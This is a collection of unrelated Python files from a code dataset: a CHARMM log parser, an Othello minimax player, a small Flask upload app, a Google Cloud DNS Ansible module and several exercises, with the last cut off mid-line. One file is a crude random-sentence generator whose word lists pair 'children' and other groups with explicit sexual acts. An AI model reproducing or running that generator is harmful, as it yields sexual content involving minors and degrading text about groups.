float(m.group(1).strip())\n parser.set_parameter(\"Input:Timestep\", step_size * 1e-15, \"Second per Step\")\n j += 1\n\n if re.search(r'NORMAL TERMINATION BY NORMAL STOP', lines[j]):\n parser.successfulRun = True\n\n if re.search(r'JOB ACCOUNTING INFORMATION', lines[j]):\n parser.successfulRun = True\n\n j += 1\n for k in range(256):\n if j > len(lines) - 1:\n break\n m = re.search(r'ELAPSED TIME:\\s*([\\d.]+)\\s*MINUTES', lines[j])\n if m:\n wall_clock_time = 60.0 * float(m.group(1).strip())\n parser.set_statistic(\"Wall Clock Time\", wall_clock_time, \"Second\")\n\n m = re.search(r'CPU TIME:\\s*([\\d.]+)\\s*MINUTES', lines[j])\n if m:\n parser.set_statistic(\"User Time\", 60.0 * float(m.group(1).strip()), \"Second\")\n\n m = re.search(r'ELAPSED TIME:\\s*([\\d.]+)\\s*SECONDS', lines[j])\n if m:\n wall_clock_time = float(m.group(1).strip())\n parser.set_statistic(\"Wall Clock Time\", wall_clock_time, \"Second\")\n\n m = re.search(r'CPU TIME:\\s*([\\d.]+)\\s*SECONDS', lines[j])\n if m:\n parser.set_statistic(\"User Time\", m.group(1).strip(), \"Second\")\n\n j += 1\n if j > len(lines) - 1:\n break\n\n if re.search(r'Parallel load balance \\(sec', lines[j]):\n j += 1\n # grab the column headers from the output, e.g.\n #\n # Parallel load balance (sec.):\n # Node Eext Eint Wait Comm List Integ Total\n # 0 205.5 6.4 1.2 31.2 23.2 2.8 270.4\n # 1 205.2 7.3 1.1 31.2 23.3 3.2 271.2\n # 2 205.2 7.7 0.6 32.3 23.3 3.2 272.3\n # 3 205.2 7.8 0.6 32.1 23.3 3.3 272.3\n # PARALLEL> Average timing for all nodes:\n # 4 205.3 7.3 0.9 31.7 23.3 3.1 271.6\n time_breakdown_columns = lines[j].strip().split()\n\n if re.search(r'PARALLEL>\\s*Average timing for all nodes', lines[j]) and time_breakdown_columns:\n j += 1\n time_breakdown = lines[j].strip().split()\n if len(time_breakdown_columns) == len(time_breakdown):\n for k in range(len(time_breakdown)):\n if time_breakdown_columns[k] == \"Eext\":\n parser.set_statistic(\"Time Spent in External Energy Calculation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Eint\":\n parser.set_statistic(\"Time Spent in Internal Energy Calculation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Wait\":\n parser.set_statistic(\"Time Spent in Waiting (Load Unbalance-ness)\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"List\":\n parser.set_statistic(\"Time Spent in Non-Bond List Generation\", time_breakdown[k], \"Second\")\n if time_breakdown_columns[k] == \"Integ\":\n parser.set_statistic(\"Time Spent in Integration\", time_breakdown[k], \"Second\")\n\n j += 1\n if num_atoms > 0:\n parser.set_parameter(\"Input:Number of Atoms\", num_atoms)\n if num_bonds > 0:\n parser.set_parameter(\"Input:Number of Bonds\", num_bonds)\n if num_angles > 0:\n parser.set_parameter(\"Input:Number of Angles\", num_angles)\n if num_dihedrals > 0:\n parser.set_parameter(\"Input:Number of Dihedrals\", num_dihedrals)\n\n if wall_clock_time > 0.0 and num_steps > 0 and step_size > 0.0:\n # $stepSize is in femtoseconds\n # $wallClockTime is in seconds\n parser.set_statistic(\"Molecular Dynamics Simulation Performance\",\n (1e-6 * step_size * num_steps) / (wall_clock_time / 86400.0) * 1e-9, \"Second per Day\")\n\n if __name__ == \"__main__\":\n # output for testing purpose\n print(\"parsing complete:\", parser.parsing_complete())\n parser.print_params_stats_as_must_have()\n print(parser.get_xml())\n\n # return complete XML overwize return None\n return parser.get_xml()\n\n\nif __name__ == \"__main__\":\n \"\"\"stand alone testing\"\"\"\n 
jobdir = sys.argv[1]\n    print(\"Processing Output From\", jobdir)\n    process_appker_output(appstdout=os.path.join(jobdir, \"appstdout\"), geninfo=os.path.join(jobdir, \"gen.info\"))\n","sub_path":"akrr/parsers/charmm_parser.py","file_name":"charmm_parser.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"426896569","text":"#Author: Steven Touchstone\n#Purpose: This is a dirty alternative to \"awefulpeotry1.py\"\n#Date: 10/16/18\n\nimport random\narticles = (\"The\",\"Some\",\"Most\",\"No\",\"Any\",\"All\")\nsubjects = (\"girls\",\"boys\",\"men\",\"women\",\"children\",\"elderly\",\"people\",\"humans\",\"nymphos\",\"lesbians\",\"gays\")\nverbs = (\"love\",\"like\",\"rub\",\"suck\",\"fuck\",\"lick\",\"masterbate\",\"finger\",\"carress\",\"tickle\",\"kiss\",\"stroke\",\"swallow\",\"smell\",\"gang bang\")\nnouns = (\"nipples\",\"dicks\",\"pussies\",\"breasts\",\"clits\",\"willies\",\"penises\",\"peckers\",\"vaginas\",\"balls\",\"assholes\",\"dildos\",\"cum\",\"toys\")\nadverbs = (\"loudly\",\"quietly\",\"well\",\"badly\",\"rudely\",\"terribly\",\"vigourously\",\"lovingly\",\"quickly\",\"hungrily\")\ncount = 0\n\nwhile count <= 5:\n\tstyle = random.randint(1,2)\n\tif style == 1:\n\t\tsub = random.choice(subjects)\n\t\tver = random.choice(verbs)\n\t\tnon = random.choice(nouns)\n\t\tprint(sub,ver,non)\n\tif style == 2:\n\t\tart = random.choice(articles)\n\t\tsub = random.choice(subjects)\n\t\tver = random.choice(verbs)\n\t\tnon = random.choice(nouns)\n\t\tadv = random.choice(adverbs)\n\t\tprint(art,sub,ver,non,adv)\n\tcount += 1","sub_path":"Python_Class/dirty_sentence_gen.py","file_name":"dirty_sentence_gen.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"245628367","text":"#Project for the Artificial Intelligence course, term 2017.1, DCC UFRJ\n#Group: David Gomes and Mauricio Borges\n#Professor: Joao Carlos\n\nimport copy #Used to copy lists and matrices\nimport sys #Used to implement computational infinity \n\nclass infinity:\n    \n    def __init__(self, color):\n        self.color = color\n        #Initializes the number of moves already played\n        global njogadas\n        njogadas = 0\n\n#############################################################################################\n####################### GAME HEURISTICS #####################################################\n\n    def amadoscantos(self, board): #Whoever controls the corners has a better chance of winning : [1][1],[1][8],[8][1],[8][8]\n        resultado = 0\n        cantos = (1,8)\n        for i in cantos:\n            for j in cantos:\n                if board.board[i][j] == self.color:\n                    resultado += sys.maxint\n                elif ((board.board[i][j] != self.color) and (board.board[i][j] != board.EMPTY)):\n                    resultado -= sys.maxint\n        return resultado\n\n    def contardominio(self, board): #How many squares are under my control\n        minhascasas = 0.0\n        for i in range(1, 9):\n            for j in range(1, 9):\n                if board.board[i][j] == self.color:\n                    minhascasas += 1.0\n        return minhascasas\n\n    def meusmovimentosdisponiveis(self, board):\n        return len(board.valid_moves(self.color))\n\n    def movimentosdisponiveisinimigo(self, board):\n        if (self.color == board.WHITE):\n            return len(board.valid_moves(board.BLACK))\n        else:\n            return len(board.valid_moves(board.WHITE))\n    \n\n#############################################################################################\n####################### RESULTING HEURISTIC #################################################\n\n    def heuristic(self, board):\n        return self.meusmovimentosdisponiveis(board) + self.amadoscantos(board) - self.movimentosdisponiveisinimigo(board) + (\n            self.contardominio(board) / 100) \n\n#############################################################################################\n################## MINIMAX ALGORITHM WITH ALPHA-BETA PRUNING ################################\n\n    def minmaxcortealphabeta(self, board, depth, alpha, beta, tipo):\n        global jogada\n        global auxiliar\n        global njogadas\n        \n        #Pass the turn\n        if (depth == 0) or (self.meusmovimentosdisponiveis(board) == 0):\n            njogadas-=1\n            return self.heuristic(board)\n\n        #Define the enemy's color\n        enemyColor = board.BLACK\n        if (self.color == board.BLACK):\n            enemyColor = board.WHITE\n        \n        \n        if (tipo == False): # If tipo is False, run MIN\n            #MIN tree\n            moves = board.valid_moves(enemyColor)\n            #Initialize the node as +infinity\n            no = sys.maxint\n            #For each possible move\n            for move in moves:\n                newboard = copy.deepcopy(board)\n                newboard.play(move, enemyColor)\n                no = min(\n                    no,\n                    self.minmaxcortealphabeta(\n                        newboard,\n                        depth - 1,\n                        alpha,\n                        beta,\n                        True))\n                beta = min(beta, no)\n                #Prune the tree\n                if (beta <= alpha):\n                    break\n            return no\n        #MAX tree\n        else:\n            moves = board.valid_moves(self.color)\n            #Initialize the node as -infinity\n            no = -sys.maxint\n            for move in moves:\n                newboard = copy.deepcopy(board)\n                newboard.play(move, self.color)\n                no = max(\n                    no,\n                    self.minmaxcortealphabeta(\n                        newboard,\n                        depth - 1,\n                        alpha,\n                        beta,\n                        False))\n                alpha = max(alpha, no)\n                if (depth == profundidade) and (no > auxiliar):\n                    auxiliar = no\n                    jogada = copy.copy(move)\n                #Prune the tree\n                if (beta <= alpha):\n                    break\n            return no\n\n#############################################################################################\n####################### PLAYING #############################################################\n\n    def play(self, board):\n        moves = board.valid_moves(self.color)\n        global profundidade\n        global auxiliar\n        global njogadas \n        #A smaller depth reduces the time per move when there are many possible moves\n        profundidade = 2\n        #If 21 moves have already been played, then increase the tree depth\n        if (njogadas>21):\n            profundidade = 5\n        #Helper for comparing node values\n        auxiliar = -sys.maxint\n        #call the minimax algorithm\n        self.minmaxcortealphabeta(board, profundidade, -sys.maxint, sys.maxint, True)\n        global jogada\n        #One more move has been made, so add 1 to the move count\n        #This approach improves running time compared to other code that searches for the free squares on every move\n        njogadas+=1\n        return jogada\n\n#############################################################################################\n#############################################################################################\n","sub_path":"DavideMauricio_OthelloIA/models/players/infinity_player.py","file_name":"infinity_player.py","file_ext":"py","file_size_in_byte":5627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"179123136","text":"import json\ndef send_data(gfile):\n    data = json.dumps(gfile)\n    f=open(\"file.json\",\"a+\")\n    f.write(data)\n    f.close()\n\ndef search(name):\n    glist = json.load(open('file.json'))\n    print(glist[name])\n\nnum = int(input(\"Enter the number of items to store or press '0' => \"))\nitem_list={}\n\nif num!=0:\n    for i in range(1,num+1):\n        name = input(\"Enter the name of item=> \")\n        quantity = 
input(\"Enter the quantity to store=> \")\n item_list[name] = quantity\n send_data(item_list)\n\nfind = input(\"Enter the item to search=> \")\nsearch(find)\n","sub_path":"code/python/day-3/grocery.py","file_name":"grocery.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"542221848","text":"from flask import Flask, request, redirect, render_template\nfrom storage import Storage\n# try:\n# import customconfig as config\n# except:\n# import config\nimport config\n\napp = Flask(__name__)\nstorage = Storage()\n\n@app.route('/acp', methods=['GET'])\ndef acp():\n return render_template('acp/main.html')\n\n@app.route('/acp/upload', methods=['GET', 'POST'])\ndef upload():\n image_urls = []\n if request.method == 'POST':\n if 'images' not in request.files:\n return redirect(request.url)\n images = request.files.getlist('images')\n for image in images:\n result = storage.save(image)\n if result['status'] == 'success':\n image_urls.append(result['url'])\n return render_template('acp/upload.html', image_urls=image_urls)\n\nif __name__ == '__main__':\n app.run(**config.APP_PARAMS)","sub_path":"app_old/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583134078","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2017 Google\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# ----------------------------------------------------------------------------\n#\n# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***\n#\n# ----------------------------------------------------------------------------\n#\n# This file is automatically generated by Magic Modules and manual\n# changes will be clobbered when the file is regenerated.\n#\n# Please read more about how to change this file at\n# https://www.github.com/GoogleCloudPlatform/magic-modules\n#\n# ----------------------------------------------------------------------------\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\n################################################################################\n# Documentation\n################################################################################\n\nANSIBLE_METADATA = {'metadata_version': '1.1', 'status': [\"preview\"], 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: gcp_dns_managed_zone\ndescription:\n- A zone is a subtree of the DNS namespace under one administrative responsibility.\n A ManagedZone is a resource that represents a DNS zone hosted by the Cloud DNS service.\nshort_description: Creates a GCP ManagedZone\nversion_added: 2.5\nauthor: Google Inc. (@googlecloudplatform)\nrequirements:\n- python >= 2.6\n- requests >= 2.18.4\n- google-auth >= 1.3.0\noptions:\n state:\n description:\n - Whether the given object should exist in GCP\n choices:\n - present\n - absent\n default: present\n type: str\n description:\n description:\n - A mutable string of at most 1024 characters associated with this resource for\n the user's convenience. 
Has no effect on the managed zone's function.\n required: true\n type: str\n dns_name:\n description:\n - The DNS name of this managed zone, for instance \"example.com.\".\n required: true\n type: str\n dnssec_config:\n description:\n - DNSSEC configuration.\n required: false\n type: dict\n version_added: 2.9\n suboptions:\n kind:\n description:\n - Identifies what kind of resource this is.\n required: false\n default: dns#managedZoneDnsSecConfig\n type: str\n non_existence:\n description:\n - Specifies the mechanism used to provide authenticated denial-of-existence\n responses.\n - 'Some valid choices include: \"nsec\", \"nsec3\"'\n required: false\n type: str\n state:\n description:\n - Specifies whether DNSSEC is enabled, and what mode it is in.\n - 'Some valid choices include: \"off\", \"on\", \"transfer\"'\n required: false\n type: str\n default_key_specs:\n description:\n - Specifies parameters that will be used for generating initial DnsKeys for\n this ManagedZone. If you provide a spec for keySigning or zoneSigning, you\n must also provide one for the other.\n required: false\n type: list\n suboptions:\n algorithm:\n description:\n - String mnemonic specifying the DNSSEC algorithm of this key.\n - 'Some valid choices include: \"ecdsap256sha256\", \"ecdsap384sha384\", \"rsasha1\",\n \"rsasha256\", \"rsasha512\"'\n required: false\n type: str\n key_length:\n description:\n - Length of the keys in bits.\n required: false\n type: int\n key_type:\n description:\n - Specifies whether this is a key signing key (KSK) or a zone signing\n key (ZSK). Key signing keys have the Secure Entry Point flag set and,\n when active, will only be used to sign resource record sets of type\n DNSKEY. Zone signing keys do not have the Secure Entry Point flag set\n and will be used to sign all other types of resource record sets. .\n - 'Some valid choices include: \"keySigning\", \"zoneSigning\"'\n required: false\n type: str\n kind:\n description:\n - Identifies what kind of resource this is.\n required: false\n default: dns#dnsKeySpec\n type: str\n name:\n description:\n - User assigned name for this resource.\n - Must be unique within the project.\n required: true\n type: str\n name_server_set:\n description:\n - Optionally specifies the NameServerSet for this ManagedZone. A NameServerSet\n is a set of DNS name servers that all host the same ManagedZones. 
Most users\n will leave this field unset.\n required: false\n type: str\n labels:\n description:\n - A set of key/value label pairs to assign to this ManagedZone.\n required: false\n type: dict\n version_added: 2.8\n visibility:\n description:\n - 'The zone''s visibility: public zones are exposed to the Internet, while private\n zones are visible only to Virtual Private Cloud resources.'\n - 'Must be one of: `public`, `private`.'\n - 'Some valid choices include: \"private\", \"public\"'\n required: false\n default: public\n type: str\n version_added: 2.8\n private_visibility_config:\n description:\n - For privately visible zones, the set of Virtual Private Cloud resources that\n the zone is visible from.\n required: false\n type: dict\n version_added: 2.8\n suboptions:\n networks:\n description:\n - The list of VPC networks that can see this zone.\n required: false\n type: list\n suboptions:\n network_url:\n description:\n - The fully qualified URL of the VPC network to bind to.\n - This should be formatted like `U(https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`)\n .\n required: false\n type: str\nextends_documentation_fragment: gcp\nnotes:\n- 'API Reference: U(https://cloud.google.com/dns/api/v1/managedZones)'\n- 'Managing Zones: U(https://cloud.google.com/dns/zones/)'\n'''\n\nEXAMPLES = '''\n- name: create a managed zone\n gcp_dns_managed_zone:\n name: test_object\n dns_name: test.somewild2.example.com.\n description: test zone\n project: test_project\n auth_kind: serviceaccount\n service_account_file: \"/tmp/auth.pem\"\n state: present\n'''\n\nRETURN = '''\ndescription:\n description:\n - A mutable string of at most 1024 characters associated with this resource for\n the user's convenience. Has no effect on the managed zone's function.\n returned: success\n type: str\ndnsName:\n description:\n - The DNS name of this managed zone, for instance \"example.com.\".\n returned: success\n type: str\ndnssecConfig:\n description:\n - DNSSEC configuration.\n returned: success\n type: complex\n contains:\n kind:\n description:\n - Identifies what kind of resource this is.\n returned: success\n type: str\n nonExistence:\n description:\n - Specifies the mechanism used to provide authenticated denial-of-existence\n responses.\n returned: success\n type: str\n state:\n description:\n - Specifies whether DNSSEC is enabled, and what mode it is in.\n returned: success\n type: str\n defaultKeySpecs:\n description:\n - Specifies parameters that will be used for generating initial DnsKeys for\n this ManagedZone. If you provide a spec for keySigning or zoneSigning, you\n must also provide one for the other.\n returned: success\n type: complex\n contains:\n algorithm:\n description:\n - String mnemonic specifying the DNSSEC algorithm of this key.\n returned: success\n type: str\n keyLength:\n description:\n - Length of the keys in bits.\n returned: success\n type: int\n keyType:\n description:\n - Specifies whether this is a key signing key (KSK) or a zone signing key\n (ZSK). Key signing keys have the Secure Entry Point flag set and, when\n active, will only be used to sign resource record sets of type DNSKEY.\n Zone signing keys do not have the Secure Entry Point flag set and will\n be used to sign all other types of resource record sets. 
.\n returned: success\n type: str\n kind:\n description:\n - Identifies what kind of resource this is.\n returned: success\n type: str\nid:\n description:\n - Unique identifier for the resource; defined by the server.\n returned: success\n type: int\nname:\n description:\n - User assigned name for this resource.\n - Must be unique within the project.\n returned: success\n type: str\nnameServers:\n description:\n - Delegate your managed_zone to these virtual name servers; defined by the server\n .\n returned: success\n type: list\nnameServerSet:\n description:\n - Optionally specifies the NameServerSet for this ManagedZone. A NameServerSet is\n a set of DNS name servers that all host the same ManagedZones. Most users will\n leave this field unset.\n returned: success\n type: str\ncreationTime:\n description:\n - The time that this resource was created on the server.\n - This is in RFC3339 text format.\n returned: success\n type: str\nlabels:\n description:\n - A set of key/value label pairs to assign to this ManagedZone.\n returned: success\n type: dict\nvisibility:\n description:\n - 'The zone''s visibility: public zones are exposed to the Internet, while private\n zones are visible only to Virtual Private Cloud resources.'\n - 'Must be one of: `public`, `private`.'\n returned: success\n type: str\nprivateVisibilityConfig:\n description:\n - For privately visible zones, the set of Virtual Private Cloud resources that the\n zone is visible from.\n returned: success\n type: complex\n contains:\n networks:\n description:\n - The list of VPC networks that can see this zone.\n returned: success\n type: complex\n contains:\n networkUrl:\n description:\n - The fully qualified URL of the VPC network to bind to.\n - This should be formatted like `U(https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`)\n .\n returned: success\n type: str\n'''\n\n################################################################################\n# Imports\n################################################################################\n\nfrom ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict\nimport json\n\n################################################################################\n# Main\n################################################################################\n\n\ndef main():\n \"\"\"Main function\"\"\"\n\n module = GcpModule(\n argument_spec=dict(\n state=dict(default='present', choices=['present', 'absent'], type='str'),\n description=dict(required=True, type='str'),\n dns_name=dict(required=True, type='str'),\n dnssec_config=dict(\n type='dict',\n options=dict(\n kind=dict(default='dns#managedZoneDnsSecConfig', type='str'),\n non_existence=dict(type='str'),\n state=dict(type='str'),\n default_key_specs=dict(\n type='list',\n elements='dict',\n options=dict(\n algorithm=dict(type='str'), key_length=dict(type='int'), key_type=dict(type='str'), kind=dict(default='dns#dnsKeySpec', type='str')\n ),\n ),\n ),\n ),\n name=dict(required=True, type='str'),\n name_server_set=dict(type='str'),\n labels=dict(type='dict'),\n visibility=dict(default='public', type='str'),\n private_visibility_config=dict(type='dict', options=dict(networks=dict(type='list', elements='dict', options=dict(network_url=dict(type='str'))))),\n )\n )\n\n if not module.params['scopes']:\n module.params['scopes'] = ['https://www.googleapis.com/auth/ndev.clouddns.readwrite']\n\n state = module.params['state']\n kind = 
'dns#managedZone'\n\n fetch = fetch_resource(module, self_link(module), kind)\n changed = False\n\n if fetch:\n if state == 'present':\n if is_different(module, fetch):\n update(module, self_link(module), kind, fetch)\n fetch = fetch_resource(module, self_link(module), kind)\n changed = True\n else:\n delete(module, self_link(module), kind)\n fetch = {}\n changed = True\n else:\n if state == 'present':\n fetch = create(module, collection(module), kind)\n changed = True\n else:\n fetch = {}\n\n fetch.update({'changed': changed})\n\n module.exit_json(**fetch)\n\n\ndef create(module, link, kind):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.post(link, resource_to_request(module)), kind)\n\n\ndef update(module, link, kind, fetch):\n update_fields(module, resource_to_request(module), response_to_hash(module, fetch))\n return fetch_resource(module, self_link(module), kind)\n\n\ndef update_fields(module, request, response):\n if (\n response.get('description') != request.get('description')\n or response.get('labels') != request.get('labels')\n or response.get('privateVisibilityConfig') != request.get('privateVisibilityConfig')\n ):\n description_update(module, request, response)\n\n\ndef description_update(module, request, response):\n auth = GcpSession(module, 'dns')\n auth.patch(\n ''.join([\"https://www.googleapis.com/dns/v1/\", \"projects/{project}/managedZones/{name}\"]).format(**module.params),\n {\n u'description': module.params.get('description'),\n u'labels': module.params.get('labels'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(module.params.get('private_visibility_config', {}), module).to_request(),\n },\n )\n\n\ndef delete(module, link, kind):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.delete(link), kind)\n\n\ndef resource_to_request(module):\n request = {\n u'kind': 'dns#managedZone',\n u'description': module.params.get('description'),\n u'dnsName': module.params.get('dns_name'),\n u'dnssecConfig': ManagedZoneDnssecconfig(module.params.get('dnssec_config', {}), module).to_request(),\n u'name': module.params.get('name'),\n u'nameServerSet': module.params.get('name_server_set'),\n u'labels': module.params.get('labels'),\n u'visibility': module.params.get('visibility'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(module.params.get('private_visibility_config', {}), module).to_request(),\n }\n return_vals = {}\n for k, v in request.items():\n if v or v is False:\n return_vals[k] = v\n\n return return_vals\n\n\ndef fetch_resource(module, link, kind, allow_not_found=True):\n auth = GcpSession(module, 'dns')\n return return_if_object(module, auth.get(link), kind, allow_not_found)\n\n\ndef self_link(module):\n return \"https://www.googleapis.com/dns/v1/projects/{project}/managedZones/{name}\".format(**module.params)\n\n\ndef collection(module):\n return \"https://www.googleapis.com/dns/v1/projects/{project}/managedZones\".format(**module.params)\n\n\ndef return_if_object(module, response, kind, allow_not_found=False):\n # If not found, return nothing.\n if allow_not_found and response.status_code == 404:\n return None\n\n # If no content, return nothing.\n if response.status_code == 204:\n return None\n\n try:\n module.raise_for_status(response)\n result = response.json()\n except getattr(json.decoder, 'JSONDecodeError', ValueError):\n module.fail_json(msg=\"Invalid JSON response with error: %s\" % response.text)\n\n if navigate_hash(result, ['error', 'errors']):\n 
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))\n\n return result\n\n\ndef is_different(module, response):\n request = resource_to_request(module)\n response = response_to_hash(module, response)\n\n # Remove all output-only from response.\n response_vals = {}\n for k, v in response.items():\n if k in request:\n response_vals[k] = v\n\n request_vals = {}\n for k, v in request.items():\n if k in response:\n request_vals[k] = v\n\n return GcpRequest(request_vals) != GcpRequest(response_vals)\n\n\n# Remove unnecessary properties from the response.\n# This is for doing comparisons with Ansible's current parameters.\ndef response_to_hash(module, response):\n return {\n u'description': response.get(u'description'),\n u'dnsName': response.get(u'dnsName'),\n u'dnssecConfig': ManagedZoneDnssecconfig(response.get(u'dnssecConfig', {}), module).from_response(),\n u'id': response.get(u'id'),\n u'name': response.get(u'name'),\n u'nameServers': response.get(u'nameServers'),\n u'nameServerSet': response.get(u'nameServerSet'),\n u'creationTime': response.get(u'creationTime'),\n u'labels': response.get(u'labels'),\n u'visibility': response.get(u'visibility'),\n u'privateVisibilityConfig': ManagedZonePrivatevisibilityconfig(response.get(u'privateVisibilityConfig', {}), module).from_response(),\n }\n\n\nclass ManagedZoneDnssecconfig(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = {}\n\n def to_request(self):\n return remove_nones_from_dict(\n {\n u'kind': self.request.get('kind'),\n u'nonExistence': self.request.get('non_existence'),\n u'state': self.request.get('state'),\n u'defaultKeySpecs': ManagedZoneDefaultkeyspecsArray(self.request.get('default_key_specs', []), self.module).to_request(),\n }\n )\n\n def from_response(self):\n return remove_nones_from_dict(\n {\n u'kind': self.request.get(u'kind'),\n u'nonExistence': self.request.get(u'nonExistence'),\n u'state': self.request.get(u'state'),\n u'defaultKeySpecs': ManagedZoneDefaultkeyspecsArray(self.request.get(u'defaultKeySpecs', []), self.module).from_response(),\n }\n )\n\n\nclass ManagedZoneDefaultkeyspecsArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict(\n {u'algorithm': item.get('algorithm'), u'keyLength': item.get('key_length'), u'keyType': item.get('key_type'), u'kind': item.get('kind')}\n )\n\n def _response_from_item(self, item):\n return remove_nones_from_dict(\n {u'algorithm': item.get(u'algorithm'), u'keyLength': item.get(u'keyLength'), u'keyType': item.get(u'keyType'), u'kind': item.get(u'kind')}\n )\n\n\nclass ManagedZonePrivatevisibilityconfig(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = {}\n\n def to_request(self):\n return remove_nones_from_dict({u'networks': ManagedZoneNetworksArray(self.request.get('networks', []), self.module).to_request()})\n\n def from_response(self):\n return remove_nones_from_dict({u'networks': ManagedZoneNetworksArray(self.request.get(u'networks', []), self.module).from_response()})\n\n\nclass 
ManagedZoneNetworksArray(object):\n def __init__(self, request, module):\n self.module = module\n if request:\n self.request = request\n else:\n self.request = []\n\n def to_request(self):\n items = []\n for item in self.request:\n items.append(self._request_for_item(item))\n return items\n\n def from_response(self):\n items = []\n for item in self.request:\n items.append(self._response_from_item(item))\n return items\n\n def _request_for_item(self, item):\n return remove_nones_from_dict({u'networkUrl': item.get('network_url')})\n\n def _response_from_item(self, item):\n return remove_nones_from_dict({u'networkUrl': item.get(u'networkUrl')})\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"env/lib/python3.9/site-packages/ansible/modules/cloud/google/gcp_dns_managed_zone.py","file_name":"gcp_dns_managed_zone.py","file_ext":"py","file_size_in_byte":21120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"174599227","text":"class Solution:\n def numberToWords(self, num: int) -> str:\n #We only consider zero in this case, otherwise everywhere else we will ignore 0\n if num==0:\n return \"Zero\"\n suffix=[\"\",\"Thousand\",\"Million\",\"Billion\"]\n \n onetotwenty={1:\"One\",2:\"Two\",3:\"Three\",4:\"Four\",5:\"Five\",6:\"Six\",7:\"Seven\",8:\"Eight\",9:\"Nine\",10:\"Ten\",11:\"Eleven\",12:\"Twelve\",13:\"Thirteen\",14:\"Fourteen\",15:\"Fifteen\",16:\"Sixteen\",17:\"Seventeen\",18:\"Eighteen\",19:\"Nineteen\"}\n tens={20:\"Twenty\",30:\"Thirty\",40:\"Forty\",50:\"Fifty\",60:\"Sixty\",70:\"Seventy\",80:\"Eighty\",90:\"Ninety\"}\n result=\"\"\n idx=0\n #Helper to calculate num in pairs of 3 and we will then combine the suffix\n def helper(nump):\n if nump==0:\n return \"\"\n if nump<20:\n return onetotwenty[nump]+\" \"\n elif nump<100:#less than 100 we get the tens +onetotwenty\n v=(nump//10)*10\n return tens[v]+\" \"+helper(nump%10)\n else:\n v=(nump//100)\n return onetotwenty[v]+\" Hundred \"+helper(nump%100)\n \n \n while(num>0):\n #Divide by thousand to get 3 digits\n \n if (num%1000>0):\n #we will combine the result at last as we are processing from right to left\n result=helper(num%1000)+suffix[idx]+\" \"+result\n #divide the number by 1000 to remove last 3 digits\n num=num//1000\n idx+=1\n return result.strip()\n #Time O(n), n=number of digits in num but it is constant\n #Space O(1)\n \n \n","sub_path":"problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"646592798","text":"from itertools import product, permutations, combinations\n\nclass MaxUtil():\n def __init__(self, util_rav, end_rav, prices_rav, G, budget, ngoods, nnodes):\n self.util_rav = util_rav\n self.end_rav = end_rav\n self.prices_rav = prices_rav\n self.G = G\n self.budget = budget\n self.ngoods = ngoods\n self.nnodes = nnodes\n\n def get_max_util(self):\n max_util = {}\n\n def l(i,j,k):\n countj = j\n countk = k*self.nnodes\n counti = div * i\n return counti + countk + countj\n\n div = self.nnodes * self.ngoods\n for n in self.G:\n temp = []\n combs = []\n mx = 0\n mxu = 0\n for j in self.G:\n for k in range(self.ngoods):\n if self.util_rav[l(n,j,k)] == 1:\n temp.append(l(n,j,k))\n for ii in range(len(temp)):\n combs.append(list(combinations(temp, ii+1)))\n combs = [item for sublist in combs for item in sublist]\n maxu = 0\n for item in combs:\n s = 0\n for ii in item:\n s += self.end_rav[ii]*self.prices_rav[ii]\n if s <= 
